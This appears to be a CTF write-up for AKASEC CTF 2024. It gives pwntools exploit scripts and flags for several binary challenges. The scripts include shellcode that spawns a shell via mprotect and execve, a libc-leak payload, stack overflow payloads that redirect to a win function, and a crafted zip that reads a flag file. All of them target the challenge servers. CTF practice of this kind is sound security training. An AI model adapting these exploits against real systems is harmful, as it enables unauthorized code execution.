# (writeup) AKASEC CTF 2024 ## good-trip ```py #!/usr/bin/python3 from pwn import * exe = ELF('./good_trip', checksec=False) context.binary = exe info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) sln = lambda msg, num: sla(msg, str(num).encode()) sn = lambda msg, num: sa(msg, str(num).encode()) def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*exec+64 c ''') input() if args.REMOTE: p = remote('172.210.129.230',1351) else: p = process(exe.path) GDB() sla(b'size >> ',str(0x1000)) pl = asm(f""" mov rsp, 0x404a00 mov rdi, 0x1337131000 mov rsi, 0x1000 mov rdx, 7 mov rcx, {exe.plt.mprotect} call rcx xor rdi, rdi mov rsi, 0x1337131048 mov rdx, 0x100 mov rcx, {exe.plt.read} call rcx nop nop nop """,arch='amd64') pl2 = asm(f""" mov rbx, 29400045130965551 push rbx mov rdi, rsp xor rsi, rsi xor rdx, rdx mov rax, 0x3b syscall """,arch='amd64') payload = pl sa(b'>> ',payload) sleep(2) s(pl2) p.interactive() #AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3} ``` >AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3} ## bad-trip ```py #!/usr/bin/python3 from pwn import * exe = ELF('./bad_trip_patched', checksec=False) libc = ELF('./libc.so.6',checksec=False) context.binary = exe info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) sln = lambda msg, num: sla(msg, str(num).encode()) sn = lambda msg, num: sa(msg, str(num).encode()) def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*exec+71 c ''') input() if args.REMOTE: p = remote('172.210.129.230',1352) else: p = process(exe.path) # GDB() p.recvuntil(b'with ') leak = int(p.recvuntil(b'\n',drop=True),16) info("leak: " + hex(leak)) libc_leak = 0x7fcb00000000 | leak libc.address = libc_leak - libc.sym.puts info("libc leak: " + hex(libc_leak)) info("libc base: " + hex(libc.address)) pl = asm(f""" mov rdi, [fs:0x300] add rdi, 120 mov rdi, [rdi] sub rdi, 163210 add rdi,0x111709 mov rsp, 0x6969696a10 mov rcx, rdi mov rbx, 29400045130965551 push rbx mov rdi, rsp xor rsi, rsi xor rdx, rdx mov rax, 0x3b call rcx """,arch='amd64') payload = pl sa(b'>> ',payload) p.interactive() #AKASEC{pr3f37CH3M_Li8C_4Ddr35532} ``` >AKASEC{pr3f37CH3M_Li8C_4Ddr35532} ## the_absolute_horror_of_the_trip - tương tự bài bad-trip - script không khác gì =))) >AKASEC{NoW_You_r34lly_H4V3_7o_pr3F37cH3M_li8C_4DDR5} ## yapping ```py #!/usr/bin/python3 from pwn import * exe = ELF('challenge', checksec=False) context.binary = exe info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) sln = lambda msg, num: sla(msg, str(num).encode()) sn = lambda msg, num: sa(msg, str(num).encode()) def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b* 0x401256 c ''') input() if args.REMOTE: p = remote('20.80.240.190',14124) else: p = process(exe.path) GDB() payload = b'a'*108 + p32(0x70) + p64(0x4011f4) s(payload) payload = b"a"*88 + flat(0x4011f1, exe.sym.user+0x70) + b'a'*4 + p32(0x70) + p64(exe.sym.win) s(payload) payload = b'a'*108 + p32(0x70) + p64(0x4011f4) s(payload) payload = b'admin\0\0\0'.ljust(108) + p32(0x70) + p64(exe.sym.win) s(payload) p.interactive() #AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9} ``` >AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9} ## zop ```py #!/usr/bin/python3 from pwn import * import os import base64 sla = lambda delim, data: p.sendlineafter(delim, data) sa = lambda delim, data: p.sendafter(delim, data) s = lambda data: p.send(data) sl = lambda data: p.sendline(data) r = lambda nbytes: p.recv(nbytes) ru = lambda data: p.recvuntil(data) rl = lambda : p.recvline() elf = context.binary = ELF('zop') def int_from_bytes(bytes): return int.from_bytes(bytes, byteorder='little') def GDB(proc): gdb.attach(p, gdbscript=''' b extract_zip b parse_lfh c ''') #context.log_level = 'debug' file = b'AAAAA'*0x20 f = open('content/a', 'wb') f.write(file) f.close() f = open('content/b', 'wb') f.write(file) f.close() os.system("zip a.zip content/a") f = open('a.zip', 'rb') content = f.read() f.close() print(content) file_name = b'hahaha\x00' extra_feild_len = b'hihi\x00' data_ = b'/chal/flag.txt\x00' content = p32(67324752) # signature content += p16(0) # version content += p16(0) # flag content += p16(0) # compression content += p16(0) # mod time content += p16(0) # mod_date content += p32(0) # checksum content += p32(0) # compressed size content += p32(len(data_)) # uncompressed size content += p16(len(file_name)) # fname_len content += p16(len(extra_feild_len)) # extra_feild_len content += file_name content += extra_feild_len content += data_ extra = b'aaa\x00' comm = b'aaa\x00' symbol = b'/chal/flag.txt\x00' content += p32(33639248) # signature content += p16(0) #version content += p16(0) # version_need content += p16(0) #flag content += p16(0) # compress content += p16(0) # mod_time content += p16(0) # mod_date content += p32(0) # checksum content += p32(0) # compmress size content += p32(len(symbol)) # uncompress size content += p16(len(file_name)) # fname_len content += p16(len(extra)) # extra_feild_len content += p16(len(comm)) # file_comm_len content += p16(0) # disk_start content += p16(0) # internal_attrs content += p32(0xa0000000) # external_attrs content += p32(0) # local_header content += file_name + extra + comm payload = base64.b64encode(content) #p = remote('0', 1349) p = remote('172.210.129.230', 1349) #p = process() #GDB(p) sla(b'file', payload) p.interactive() #AKASEC{I7_wa5_700_0BVi0u5_ri9H7?} ``` >AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}